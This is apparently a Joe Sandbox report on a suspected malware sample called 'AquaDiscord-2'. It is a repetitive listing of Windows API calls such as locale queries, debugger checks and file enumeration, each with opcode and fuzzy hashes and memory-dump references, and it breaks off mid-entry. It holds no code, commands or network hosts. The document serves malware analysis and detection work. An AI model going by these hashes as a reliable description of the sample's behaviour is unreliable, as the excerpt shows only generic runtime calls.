                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 254469556-0
                                                                                          • Opcode ID: 68770f67e1a25991ae53548a248ada90603b5893a7adf4af25b4f61875610166
                                                                                          • Instruction ID: ac04cb186d8af9a04d519f059d8451eae93b52ede320bffc0c5f485912c4bca3
                                                                                          • Opcode Fuzzy Hash: 68770f67e1a25991ae53548a248ada90603b5893a7adf4af25b4f61875610166
                                                                                          • Instruction Fuzzy Hash: 77312875D0521C9BDF61EFA4D9897CDBBB8AF08300F1041AAE50CAB250EB719A848F45
                                                                                          APIs
                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00AFA307
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00AFA316
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00AFA31F
                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00AFA32C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 2933794660-0
                                                                                          • Opcode ID: 7d06dcfe8c4c50b290d5a4ddf4ebeed139decb70ec8d91da21aaae07177ab30a
                                                                                          • Instruction ID: 63ee98bfe8c95fd5ab73d0a83e5207b46f23f7291108eb2ea5746a9db9dbd2b3
                                                                                          • Opcode Fuzzy Hash: 7d06dcfe8c4c50b290d5a4ddf4ebeed139decb70ec8d91da21aaae07177ab30a
                                                                                          • Instruction Fuzzy Hash: 84F05F75D1020DEBCB04DBB4DA499DEBBF4FF1C204BA18995E822E7150EA30AB44DB51
                                                                                          APIs
                                                                                            • Part of subcall function 00B0590A: GetLastError.KERNEL32(00000000,?,00B07C8D), ref: 00B0590E
                                                                                            • Part of subcall function 00B0590A: SetLastError.KERNEL32(00000000,?,?,00000028,00B01F53), ref: 00B059B0
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B0AD44
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B0AD8E
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B0AE54
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 661929714-0
                                                                                          • Opcode ID: da974c26dec20278c5820d1fb6fbdecb26382af015c6c8f9e0b8dbe0f8bf351f
                                                                                          • Instruction ID: a577f76c59be1c59f307594d524774bc12e29891b9ceb01d5b66cd5056fc7d4e
                                                                                          • Opcode Fuzzy Hash: da974c26dec20278c5820d1fb6fbdecb26382af015c6c8f9e0b8dbe0f8bf351f
                                                                                          • Instruction Fuzzy Hash: 7B6171719502079FEB289F24CC92BBABBE8EF04310F2089F9E905C65C5E774D991CB55
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00B01B18
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00B01B22
                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00B01B2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                          • String ID:
                                                                                          • API String ID: 3906539128-0
                                                                                          • Opcode ID: ec38f82e9e0356691823ec5ef4a6f5bc2775ded479bdb478f6bc1da09b3c596e
                                                                                          • Instruction ID: fed9a91d49c5fde0f66dbf7bb6c277a0e3c53373d71a6af7950849a972db4e88
                                                                                          • Opcode Fuzzy Hash: ec38f82e9e0356691823ec5ef4a6f5bc2775ded479bdb478f6bc1da09b3c596e
                                                                                          • Instruction Fuzzy Hash: B031D37490121C9BCB61DF68D9887DDBBB8BF08310F5045EAE41CA72A1EB709B858F44
                                                                                          APIs
                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B0E9A9,?,?,00000008,?,?,00B1535B,00000000), ref: 00B0EC7B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionRaise
                                                                                          • String ID:
                                                                                          • API String ID: 3997070919-0
                                                                                          • Opcode ID: 35a008a135a1eda0ccfeb5fa279c6392294a2b45d789f82a1552634d87be0a92
                                                                                          • Instruction ID: 3f7cc145afa7c65f6e422fc15d55a7aa8bf33ac26f89411f69d2b2beb498f11a
                                                                                          • Opcode Fuzzy Hash: 35a008a135a1eda0ccfeb5fa279c6392294a2b45d789f82a1552634d87be0a92
                                                                                          • Instruction Fuzzy Hash: 8BB10A316106099FD715CF28C486B657FE0FF45364F298A98E8AACF2E1C735E991CB40
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00AF96B1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: FeaturePresentProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 2325560087-0
                                                                                          • Opcode ID: 4e891dfc78675e38a4418c2d42c4fb871a3f47d105d78a46e1895a8934f92364
                                                                                          • Instruction ID: b735c719c13d56eeccd4d6d339a8242575b502c404df26db5cba95bc54e49ab8
                                                                                          • Opcode Fuzzy Hash: 4e891dfc78675e38a4418c2d42c4fb871a3f47d105d78a46e1895a8934f92364
                                                                                          • Instruction Fuzzy Hash: 77A17DB19216098BDB28DF98D8817ABBBF0FB48314F14852EE515EB361D7749942CF90
                                                                                          APIs
                                                                                            • Part of subcall function 00B069B4: HeapAlloc.KERNEL32(00000008,00000000,00000000,?,00B05B4F,00000001,00000364,00000002,000000FF,?,00000000,?,00AFD615,00000000,?), ref: 00B069F5
                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B0B849
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00B0B93D
                                                                                          • FindClose.KERNEL32(00000000), ref: 00B0B97C
                                                                                          • FindClose.KERNEL32(00000000), ref: 00B0B9AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                          • String ID:
                                                                                          • API String ID: 2701053895-0
                                                                                          • Opcode ID: cacb91405a59fe1e03712061d831440e83a7d7817634fd14796bd7205c879dbe
                                                                                          • Instruction ID: 625e5645add0b236e731f57fc5429e83be1f5695f1e96b06fc609a42f16c95f0
                                                                                          • Opcode Fuzzy Hash: cacb91405a59fe1e03712061d831440e83a7d7817634fd14796bd7205c879dbe
                                                                                          • Instruction Fuzzy Hash: 67512275900108AFEF24AF388C85EBEBBE9DF85354F1441E9F41997281EB318D429B60
                                                                                          APIs
                                                                                            • Part of subcall function 00B0590A: GetLastError.KERNEL32(00000000,?,00B07C8D), ref: 00B0590E
                                                                                            • Part of subcall function 00B0590A: SetLastError.KERNEL32(00000000,?,?,00000028,00B01F53), ref: 00B059B0
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B0B004
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 3736152602-0
                                                                                          • Opcode ID: d151ae14fd57fb6cc4a6a4396113bb1137fddee8d0e4797f0a4d3148882e6715
                                                                                          • Instruction ID: 5ef8e7b8daffae78ed8b0d5a30f3d91a05c6274fa4246b23e20e8394fd99434a
                                                                                          • Opcode Fuzzy Hash: d151ae14fd57fb6cc4a6a4396113bb1137fddee8d0e4797f0a4d3148882e6715
                                                                                          • Instruction Fuzzy Hash: AF218072A11206AFEB28AA25DC91EBB7BE8EF44310F1040BEF915D7191FB74ED548B50
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0
                                                                                          • API String ID: 0-4108050209
                                                                                          • Opcode ID: 78c761d3dd94adc4958bca3404364a1980e8b0223848ad30f0f9880296d58a87
                                                                                          • Instruction ID: 02ed50fcab355459941857f38065a350c6a795a03c1e9e5171324cb3c5c029d5
                                                                                          • Opcode Fuzzy Hash: 78c761d3dd94adc4958bca3404364a1980e8b0223848ad30f0f9880296d58a87
                                                                                          • Instruction Fuzzy Hash: C7B1B230A0060E8BCB26CFE8C555ABEBBB2AF15300F14061DF752DB6A1CB75AD45CB51
                                                                                          APIs
                                                                                            • Part of subcall function 00B0590A: GetLastError.KERNEL32(00000000,?,00B07C8D), ref: 00B0590E
                                                                                            • Part of subcall function 00B0590A: SetLastError.KERNEL32(00000000,?,?,00000028,00B01F53), ref: 00B059B0
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B0B124
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 3736152602-0
                                                                                          • Opcode ID: b8ecf45c4126e766741233e4700e28982a2951b45fdcf3716d4a9164d6c34e50
                                                                                          • Instruction ID: eb20eb14512e84a6de9114c6593d891aa9c3ec335bfd3ff9856e9325c9a9cf6c
                                                                                          • Opcode Fuzzy Hash: b8ecf45c4126e766741233e4700e28982a2951b45fdcf3716d4a9164d6c34e50
                                                                                          • Instruction Fuzzy Hash: 4011E972610206ABD714AF28DC56DBA7BECEF05310F1041BAF505D7281EB74ED058B90
                                                                                          APIs
                                                                                            • Part of subcall function 00B0590A: GetLastError.KERNEL32(00000000,?,00B07C8D), ref: 00B0590E
                                                                                            • Part of subcall function 00B0590A: SetLastError.KERNEL32(00000000,?,?,00000028,00B01F53), ref: 00B059B0
                                                                                          • EnumSystemLocalesW.KERNEL32(00B0ACF0,00000001,00000000,?,-00000050,?,00B0AAD3,00000000,-00000002,00000000,?,00000055,?), ref: 00B0ACBA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2417226690-0
                                                                                          • Opcode ID: 8ec670f4e2b554f2a294e52a06039f3c549a97946067d23f8d15b0e308307a57
                                                                                          • Instruction ID: fe7658b61915715541902dda453f9688f10b35729b8e947f126d1ba17fb6e2f2
                                                                                          • Opcode Fuzzy Hash: 8ec670f4e2b554f2a294e52a06039f3c549a97946067d23f8d15b0e308307a57
                                                                                          • Instruction Fuzzy Hash: 2611E9366007055FEB289F39CC916BABBD1FF80758B19496CE94647A80D771B943C740
                                                                                          APIs
                                                                                            • Part of subcall function 00B0590A: GetLastError.KERNEL32(00000000,?,00B07C8D), ref: 00B0590E
                                                                                            • Part of subcall function 00B0590A: SetLastError.KERNEL32(00000000,?,?,00000028,00B01F53), ref: 00B059B0
                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00B0AF0C,00000000,00000000,?), ref: 00B0B2A9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 3736152602-0
                                                                                          • Opcode ID: 3f4ddbe7e819ee498882c31ace697d22492d1f57667f9b8c62587012526f017f
                                                                                          • Instruction ID: 661ce1ce22b8f6bb90fe75e861df7c1bc909935d579e879063a038c8e7a2a715
                                                                                          • Opcode Fuzzy Hash: 3f4ddbe7e819ee498882c31ace697d22492d1f57667f9b8c62587012526f017f
                                                                                          • Instruction Fuzzy Hash: 9F01D632610112BBDB2C5A658C46EBE3FD8EB40358F1544A9EC27E31C0EB30FE41C694
                                                                                          APIs
                                                                                            • Part of subcall function 00B0590A: GetLastError.KERNEL32(00000000,?,00B07C8D), ref: 00B0590E
                                                                                            • Part of subcall function 00B0590A: SetLastError.KERNEL32(00000000,?,?,00000028,00B01F53), ref: 00B059B0
                                                                                          • EnumSystemLocalesW.KERNEL32(00B0AFB0,00000001,?,?,-00000050,?,00B0AA9B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00B0AF8D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2417226690-0
                                                                                          • Opcode ID: f43a5376ca8025ee2fea3e98a57d431f9fc9c1e6b068d254091b38f61dd7e667
                                                                                          • Instruction ID: e4d94e83dca009022f89e05d5837b49c02c49f15d430bcdbf491156f4ec789ed
                                                                                          • Opcode Fuzzy Hash: f43a5376ca8025ee2fea3e98a57d431f9fc9c1e6b068d254091b38f61dd7e667
                                                                                          • Instruction Fuzzy Hash: 22F0F6762003055FDB246F35DC81A7BBFD1EF81768B1589ACFA468B6D0CB71AC02C650
                                                                                          APIs
                                                                                            • Part of subcall function 00B01CD1: EnterCriticalSection.KERNEL32(?,?,00B05D98,?,00B1FC38,00000008,00B05C8A,00000000,00000000,?), ref: 00B01CE0
                                                                                          • EnumSystemLocalesW.KERNEL32(00B068B0,00000001,00B1FCB8,0000000C,00B062B1,-00000050), ref: 00B068F5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                          • String ID:
                                                                                          • API String ID: 1272433827-0
                                                                                          • Opcode ID: 84f7e1f96611ec9fbd42ebd0f7d6d4c59d5e041d8bdff8680ca88a341251460b
                                                                                          • Instruction ID: 8095a97bcaf7dc21f835db7b5d9c335b881442558ddd101ac72b5737909aebd3
                                                                                          • Opcode Fuzzy Hash: 84f7e1f96611ec9fbd42ebd0f7d6d4c59d5e041d8bdff8680ca88a341251460b
                                                                                          • Instruction Fuzzy Hash: 02F04976A00208DFD710EFA8E942BAD7BF0EB08721F00856AF5109B2E1CB759901DF84
                                                                                          APIs
                                                                                            • Part of subcall function 00B0590A: GetLastError.KERNEL32(00000000,?,00B07C8D), ref: 00B0590E
                                                                                            • Part of subcall function 00B0590A: SetLastError.KERNEL32(00000000,?,?,00000028,00B01F53), ref: 00B059B0
                                                                                          • EnumSystemLocalesW.KERNEL32(00B0B0D0,00000001,?,?,?,00B0AAF5,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00B0B0BC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2417226690-0
                                                                                          • Opcode ID: dce44c8edb7f9a3469e0c74393d17787d6076105915d4398b76bb75edb8a6422
                                                                                          • Instruction ID: 95b8796772fa4869fe34fceb5a47fe03838a0a9e3e1783c974f4cd0463f53dda
                                                                                          • Opcode Fuzzy Hash: dce44c8edb7f9a3469e0c74393d17787d6076105915d4398b76bb75edb8a6422
                                                                                          • Instruction Fuzzy Hash: C4F0E53630020997CB14AF35D855B6BBFD4EFC1760F0A4499EA198B6D0D772D843C7A0
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00B00A23,?,20001004,00000000,00000002,?,?,00AFF931), ref: 00B063E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 2299586839-0
                                                                                          • Opcode ID: f10e1b89caa5f0af2320cf43a467604b392d0dbfd2f7703ade35199e203ab89f
